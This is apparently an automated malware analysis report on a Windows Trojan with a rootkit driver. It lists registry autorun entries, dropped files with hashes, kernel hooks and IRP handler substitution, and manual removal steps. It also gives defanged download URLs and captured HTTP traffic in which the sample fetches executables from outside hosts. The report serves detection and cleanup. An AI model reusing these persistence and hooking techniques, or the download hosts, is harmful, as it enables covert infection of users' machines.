[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}]
"Flags" = "1"
[HKLM\System\CurrentControlSet\Services\cnprov]
"DisplayName" = "cnprov"
"ErrorControl" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 F6 9D 75 AB 13 28 BB D4 5B 87 F2 8A 73 1A 6D"
[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}\TypeLib]
"Version" = "1.0"
[HKCR\TypeLib\{7605CC7B-00FD-4A5F-BAFD-828342DE6279}\1.0\HELPDIR]
"(Default)" = "C:\PROGRA~1\OCINS\"
[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}\TypeLib]
"(Default)" = "{7605CC7B-00FD-4A5F-BAFD-828342DE6279}"
[HKLM\System\CurrentControlSet\Services\cnprov]
"Type" = "1"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"Icon" = "%Program Files%\OCINS\config.exe,216"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}]
"Version" = "*"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{7605CC7B-00FD-4A5F-BAFD-828342DE6279}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\ProgID]
"(Default)" = "IEAux.IEHlprObj.1"
[HKCR\IEAux.IEHlprObj]
"(Default)" = "IEAux Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Search]
"CustomizeSearch" = "http://client.jogo.cn/cdn/browser/customsearch/customsearch-en.html"
"SearchAssistant" = "http://client.jogo.cn/cdn/browser/sidesearch/sidesearch-en.html"
The following driver will be automatically launched by the OS Loader:
[HKLM\System\CurrentControlSet\Services\cnprov]
"Start" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IdnSvr" = "%Program Files%\OCINS\idnsvr.exe"
The Trojan deletes the following value(s) in system registry:
[HKLM\System\CurrentControlSet\Services\cnprov]
"InstallPath"
"DeleteFlag"
"SystemRoot"
[HKCU\Console]
"KwUnSelf"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"uninsrest"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"renewup"
"ExFilter"
The process setup.exe:3264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 62 4C 73 7C 66 E1 4B 61 7E 2D 32 FB 5D 52 AA"
The process %original file name%.exe:1712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 42 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"soft256.exe" = "soft256"
"cnnic_1009.exe" = "cnnic_1009"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process idnsvr.exe:4052 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 04 AB 01 43 81 A1 56 B7 94 93 23 C0 0F C3 E8"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
The Trojan deletes the following value(s) in system registry:
[HKCU\Console]
"KwUnSelf"
Dropped PE files
MD5 | File path |
---|---|
9f230f967a8607b7565cfcb83d963a96 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\cndsv.dll |
b06090ee2881c1bac0d275b17d140d3b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\cnprov.sys |
3d8a11f1dc9127afc415a3c5aa0f4ab8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\cnprovh.dll |
bc69dffa76af3297b653bfc814f7b87f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\config.exe |
57b46fc2b9cb59275cdcfb5e1722f48f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\convs.dll |
135ab6cf712cd9fc4b5cd55d71e781c0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\idnreg.dll |
70019002fdac4580e81d7ff75fb598db | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\idnsvr.dll |
2312b02cf8c50bc32cdb0686a9c3ac96 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\idnsvr.exe |
59edc983e52851d195e7c61e8efad602 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\ieaux.dll |
c8d32d9ce600888693ccb1864bf6bdd2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\loader.exe |
088efc555a77d8d35a9ff367ca48d86f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\setup.dll |
a4bf929fdcb401b8cfd9fd212686907e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\setup.exe |
5af44e42174649b95758b0e5ef79adf6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\uninstall.exe |
6401dc5833d65f4d95bd6e8f78fdf8a1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\cnnic_1009.exe |
f2324a0a589478957b66b967c8d95d8c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\m4.exe |
3872b1238b8e6c1b92c20e63b6560009 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\soft256.exe |
f2324a0a589478957b66b967c8d95d8c | c:\MP3\svchost.exe |
0a96acb043f1c72e088a46358bb1b5a3 | c:\Program Files\OCINS\austr.dll |
9f230f967a8607b7565cfcb83d963a96 | c:\Program Files\OCINS\cndsv.dll |
3d8a11f1dc9127afc415a3c5aa0f4ab8 | c:\Program Files\OCINS\cnprovh.dll |
bc69dffa76af3297b653bfc814f7b87f | c:\Program Files\OCINS\config.exe |
57b46fc2b9cb59275cdcfb5e1722f48f | c:\Program Files\OCINS\convs.dll |
70019002fdac4580e81d7ff75fb598db | c:\Program Files\OCINS\idnsvr.dll |
2312b02cf8c50bc32cdb0686a9c3ac96 | c:\Program Files\OCINS\idnsvr.exe |
05cc443897f1b818b45ee0678c9e506f | c:\Program Files\OCINS\ieaux.dll |
764abdae9880ab1c3ea725a9bb62b784 | c:\Program Files\OCINS\uninstall.exe |
0a96acb043f1c72e088a46358bb1b5a3 | c:\Program Files\OCINS\update\austr.dll |
f6a405cded18319b910822cfceb03af7 | c:\Program Files\OCINS\update\update.exe |
041f9424d638ddc0ff8f21d44ded7c72 | c:\WINDOWS\system32\drivers\cnprov.sys |
d5bb1996768ed9f61915be739a1fcc43 | c:\WINDOWS\system32\setup.exe.tmp |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "%System%\drivers\cnprov.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "%System%\drivers\cnprov.sys" the Trojan controls creation and closing of threads by installing the thread notifier.
Using the driver "%System%\drivers\cnprov.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
The Trojan installs the following kernel-mode hooks:
ZwClose
ZwCreateKey
ZwCreateThread
ZwDeleteKey
ZwDeleteValueKey
ZwEnumerateValueKey
ZwOpenKey
ZwQueryValueKey
ZwReplaceKey
ZwRestoreKey
ZwSetSecurityObject
ZwSetSystemInformation
ZwSetValueKey
Using the driver "%System%\drivers\cnprov.sys" the Trojan substitutes IRP handlers in a file system driver (NTFS) to control operations with files:
MJ_CREATE
MJ_CLOSE
MJ_READ
MJ_WRITE
MJ_SET_INFORMATION
Using the driver "%System%\drivers\idnaux.sys" the Trojan substitutes IRP handlers to control devices of tcpip.sys driver:
MJ_CLOSE
MJ_DEVICE_CONTROL
MJ_INTERNAL_DEVICE_CONTROL
Using the driver "%System%\drivers\cnprov.sys" the Trojan substitutes IRP handlers in a file system driver (FastFAT) to control operations with files:
MJ_CREATE
MJ_CLOSE
MJ_READ
MJ_WRITE
MJ_SET_INFORMATION
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
soft256.exe:2724
cnnic_1009.exe:2892
m4.exe:2840
update.exe:3408
setup.exe:2200
setup.exe:3476
setup.exe:3264
%original file name%.exe:1712
idnsvr.exe:4052 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\e1JePg78g.dll (33 bytes)
%System%\setup.exe (12214 bytes)
C:\MP3\svchost.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\setup.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\version.dat (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\uninstall.exe (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\kwacs.dat (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\config.exe (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\srchsp.dll (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnstc.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\path.dat (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnsvr.exe (97 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnaux.dat (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnprov.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\convf.dll (229 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cndsv.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\addrmsg.dll (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\austr.dll (65 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnrbtn.html (486 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnprov.sys (189 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnsvr.dll (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cuscfg.dat (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnaux.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\ocinfo.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnprovh.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\ieaux.dll (172 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnreg.dll (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\kwrep.dat (191 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\setup.dll (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\addrmsg.ini (6 bytes)
%Program Files%\OCINS\convf.dll (1281 bytes)
%Program Files%\OCINS\replace.dat (343 bytes)
%Program Files%\OCINS\kwacs.dat (16 bytes)
%System%\drivers\cnprov.sys (673 bytes)
%Program Files%\OCINS\cuscfg.dat (145 bytes)
%Program Files%\OCINS\ctrcfg.ini (230 bytes)
%Program Files%\OCINS\cnrbtn.html (486 bytes)
%System%\drivers\idnaux.sys (10 bytes)
%Program Files%\OCINS\version.dat (482 bytes)
%Program Files%\OCINS\kwrep.dat (191 bytes)
%Program Files%\OCINS\idnaux.dat (39 bytes)
%Program Files%\OCINS\uninstall.exe (673 bytes)
%Program Files%\OCINS\srchsp.dll (32 bytes)
%Program Files%\OCINS\ieaux.dll (673 bytes)
%System%\cnprov.dat (1 bytes)
%Program Files%\OCINS\cnstc.ini (1 bytes)
%WinDir%\ocinfo.dat (8 bytes)
%System%\idnreg.dll (36 bytes)
%Program Files%\OCINS\addrmsg.dll (601 bytes)
%Program Files%\OCINS\addrmsg.ini (6 bytes)
%Program Files%\OCINS\cnprovh.dll (601 bytes)
%Program Files%\OCINS\convs.dll (601 bytes)
%Program Files%\OCINS\cndsv.dll (601 bytes)
%Program Files%\OCINS\config.exe (601 bytes)
%Program Files%\OCINS\idnsvr.exe (601 bytes)
%Program Files%\OCINS\idnsvr.dll (601 bytes)
%Program Files%\OCINS\usrcfg.ini (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\idnsvr.exe (85 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\ieaux.dll (183 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\version.dat (479 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnprov.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnprov.sys (187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\kwacs.dat (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\idnreg.dll (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\setup.dll (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\uninstall.exe (147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\config.exe (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\path.dat (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnstc.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\setup.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnprovh.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\convs.dll (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cndsv.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\idnsvr.dll (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\loader.exe (106 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cuscfg.dat (148 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Program Files%\OCINS\update\version.dat (482 bytes)
%Program Files%\OCINS\austr.dll (65 bytes)
%Program Files%\OCINS\update\data2.cab (9696 bytes)
%Program Files%\OCINS\update\update.exe (273697 bytes)
%Program Files%\OCINS\update\austr.dll (1568 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IdnSvr" = "%Program Files%\OCINS\idnsvr.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 114688 | 35840 | 5.5358 | 5b547387783d91b4b3e6beaaea639923 |
.rsrc | 118784 | 12288 | 9728 | 4.02815 | 11196967b6fe974fa5d94b67be64252e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://update.jogo.cn/cdnClient/update/v26_p/version.dat | |
hxxp://update.jogo.cn/cdnClient/update/v26_p/data2.cab | |
hxxp://50.117.116.117/down/wxpSetup256.txt | |
hxxp://jump.knet.cn/stat/stat | |
hxxp://jump.knet.cn/stat/first | |
hxxp://50.117.120.254/down/wxpSetup256.txt | |
hxxp://update.jogo.cn/cdnClient/update/v26_p/update.exe | |
hxxp://www5.softuu.cn/down/wxpSetup256.txt | 50.117.116.117 |
update.cnnic.cn | 202.173.11.10 |
jump.cnnic.cn | 202.173.11.132 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /stat/first HTTP/1.1
Host: jump.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 53
sid=1001&pid=0000&sw=C_gr294&sp=002.006.000.000&drv=1
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Wed, 16 Apr 2014 08:33:48 GMT
POST /stat/stat HTTP/1.1
Host: jump.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 183
sid=0102&pid=C_gr294&sp=002.006.000.000&cid=aaamcjdlnpcpaaamcjdlnpcpdadadadadadadadadadadadadadadadadadadadbmdilgeogeapgmjlebcngahefeaommfomlhgempgjljdpjaggoogjhoifimlgpjhb0003&bind=0
HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1806
Date: Wed, 16 Apr 2014 08:33:48 GMT
Connection: close
<html><head><title>Apache Tomcat/7.0.22 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>java.io.FileNotFoundException: /home/knet/stat/cfg/url.properties (No such file or directory)..java.io.FileInputStream.open(Native Method)..java.io.FileInputStream.<init>(FileInputStream.java:120)..java.io.FileInputStream.<init>(FileInputStream.java:79)..java.io.FileReader.<init>(FileReader.java:41)..net.knowledgeservice.pub.util.FileUtil.fileToArray(FileUtil.java:103).
<<
<<< skipped >>>
GET /cdnClient/update/v26_p/data2.cab HTTP/1.1
Host: update.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
<<< skipped >>>
GET /cdnClient/update/v26_p/version.dat HTTP/1.1
Host: update.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 16 Apr 2014 08:33:46 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 08:54:32 GMT
ETag: "292a0e9-1e2-48b7d5e0e2200"
Accept-Ranges: bytes
Content-Length: 482
Connection: close
Content-Type: text/plain; charset=UTF-8
[version]..ver=2.6.0.42..[update]..url=hXXp://update.cnnic.cn/cdnClient/update/v26_p/version.dat..[stat]..stat=hXXp://jump.cnnic.cn/stat/stat..live=hXXp://jump.cnnic.cn/stat/first..uninstall=hXXp://jump.cnnic.cn/stat/uninstall..[exe]..version=2.6.0.12..url=hXXp://update.cnnic.cn/cdnClient/update/v26_p/update.exe..[cab]..version=2.6.0.32..url=http://update.cnnic.cn/cdnClient/update/v26_p/data.cab..[relay]..url=hXXp://update.cnnic.cn/cdnClient/update/v26_p/data2.cab..
GET /down/wxpSetup256.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: www2.softuu.cn
Connection: Keep-Alive
Cookie: PHPSESSID=hpu1peah8f6ekmonnpelhl7k24
HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Date: Wed, 16 Apr 2014 08:31:30 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1224.............Z[o.Hv. 5l.e.)....ey!K.[m[v[..` PdQ,.7.E]..H...`..d......y.Kv. .6.v~.\v.ENU..lw{:....c.R.Xu......j...Q...x...u..>..>%.r(...M..6.b/...Q....JP....3..Y....4..z...k@.Q...[.........O....O6z.Y....p(..=X..us{..T.N. .oc2iJm......y.%C<4%.g....@.......Z9......nJ7x>.C3Z....E.?.._7..Y..!...a..b..yH.H>.Ji...q...Tx@........[Q.b..]....G...3y.Q...bb4.c4%.F..R..X......CWg.P..6...?p.lt.c.....].3...,Xa.-........C......J#..&..V(L...ZT....._Gy&...n3.-..y.{..F.^....V).. .\.......(..J...Tvv*j.%..|.N.....d:1J.......9_...f .sx.F.9.M2.MG6.l.r...#;D.U...vI...].....X6|....2..1.0.....d..1......r ......}.ej....P.............$*..U.D@ql......h...C.A...C?.d.{....9..o..O.....1.4....I.1.F.[.B.. .;d.i.l....\`.......=g..........b0k.GKw.3..Cb.>...._c"..._..O...w...w....8 . .X..>......VHt...0...l5.....T*5.?"l.Z.....7......"H..pH..a".<....gM<...)0A....L0c..$ u.i:..X..S.x)..5A....6......M1..T[...<HP.-2.t........6[!.6.....$..}.!...c(.d'...f.[{.....C(..a-........h...".....:^.J].....r.'.3.0....'....f......Z.....I.1..t(.h...(!.9...g.\...$...h....pV/...o8.F.q......E.!%.BW..7"w..qm.R.LK.R....8?&..E!....a....bJLjk.*...c......pV.*......../'...@".Am5.\.cE.W.Z.k4........".........x(2f......N.....b*.T.hk.Kf.^...IE...t. ..?E%.;.@ko6.%6..>...L.E.CL....O.%@H.0j0'.-.Hr.)...B)..b.....R..*l.......#$.-...X..RJ'..a...."..w.d......fD..jc....3.96.y..}....a..t(....1...s......8(WR..v..P...,..J*Y...zQo..z.....W.7..K..W....I...B.K..$.T..KH0...TtB..&.[.qi>...P.K......./X...\..S6(...]...P.*!T..A.T.Y.m..3c...bK%z.M.:*h.M05....
<<
<<< skipped >>>
GET /down/wxpSetup256.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: www3.softuu.cn
Connection: Keep-Alive
Cookie: PHPSESSID=qekkaf4qlu6hc6dmgbnt9onfp1
HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Date: Wed, 16 Apr 2014 08:31:27 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1224.............Z[o.Hv. .6....D....B.,.....|..@...X6o&..X1.....b'.>........."@.l.........SU.$.mwg0..`l@,..NU....Um~.9l.\...6q....d.sl...z;BU.bK........)bT......gb..Y^.H.?h]}.u..?h]{.u.q....7.l..._~.....(...C....2l..[..":p..2....).}. ..'.....i...H...!...F.4cb.0.N..]....|..f...s.#...s|..vf...(...I..!...........p.G.t...H.(2B...{ .S.............4EB...l"a.....[pA.\.......Y~.......-.l..8Q:........\.3..@.`.9....s...C.."[...V.q.4.D.|~:......U.=.*.Q...t..o.8...K.0..b.U(..r....R..#oW;..S..[Ue{..._.P...T.*H.H..#.8h..O...e3.k6#2....7...'..H&.LS...w$.K.*....JvI...]...I.o"..Y..;&.Fr..6... &...."]......7.O.Dl....J.......`.A...D%.....(...A..c....w(QH..8..@r..K.>."d..t.../\=.cOS..n...Ci..E!...d..cO3`.......^.}p.E..K..l.9..HS....^-...\.....TP....aQ.....?.......................?...Z!......?.a..._...b.......B...&.q'..A. .T(..G0.*2..=.....g.R4.&(.r...D..;.J]l.........^Jb}M..F!&..x...uS..6...wB.$....i...].Wm.....i.M..rM...>....{c(..N.C..N^{.........a-........h...".....:V.J...D..2.'.3.0.....).hK...s.....108...c.%.P...._..8..=&>m.... Q&~...@....@.....7..k.o...P..b.)t5gz#|k.... ....(..9..scl.Y!D...#....]L.Il.^a..s...l.i.c....0[ ..\......HD...f*'8V.z......6&.c..`...O......{x(Pfq.....N..t..|*.T.hk.Kf%.((.?..4.... ....d.p..}...t"\}p..05!..l./...o.........|....b....P.`...p......2./a..(.A..vK..1.6*...GC...i..].VN......gF..\m.7.px.3..3.A.....!......s.7. {...,....G..J....$..(.....J...'...........'.o../..]}.Rn$u\.r..i...RY./.A9Qc.....M......@..C.,E\Rk., .`..|r..N....^t._:C...P...eR.fy.}.....^.[*.Stb.Q..t..A.?.....K....O.PR..(".#.Q
<<
<<< skipped >>>
GET /cdnClient/update/v26_p/update.exe HTTP/1.1
Host: update.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 16 Apr 2014 08:33:51 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 09:00:08 GMT
ETag: "292a0e8-6bc80-48b7d72151600"
Accept-Ranges: bytes
Content-Length: 441472
Connection: close
Content-Type: application/octet-stream
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u........=.uN.:.h........&.../....p....`.Q..6D..(N......{.".D......S.4.(....o..x........................PE..L.....@L.................P...P...............`....@.................................9.......................................................................T........................................................................................text....P.......*..................@....rdata.......`.......0..............@....data....0...p...l...6..............@....rsrc...............................@....aspack.. ..........................@....adata..............................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<
<<< skipped >>>
GET /down/wxpSetup256.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: www5.softuu.cn
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Date: Wed, 16 Apr 2014 08:31:57 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.10
Set-Cookie: PHPSESSID=l0471imf8i68j3bo1abkea0tm3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
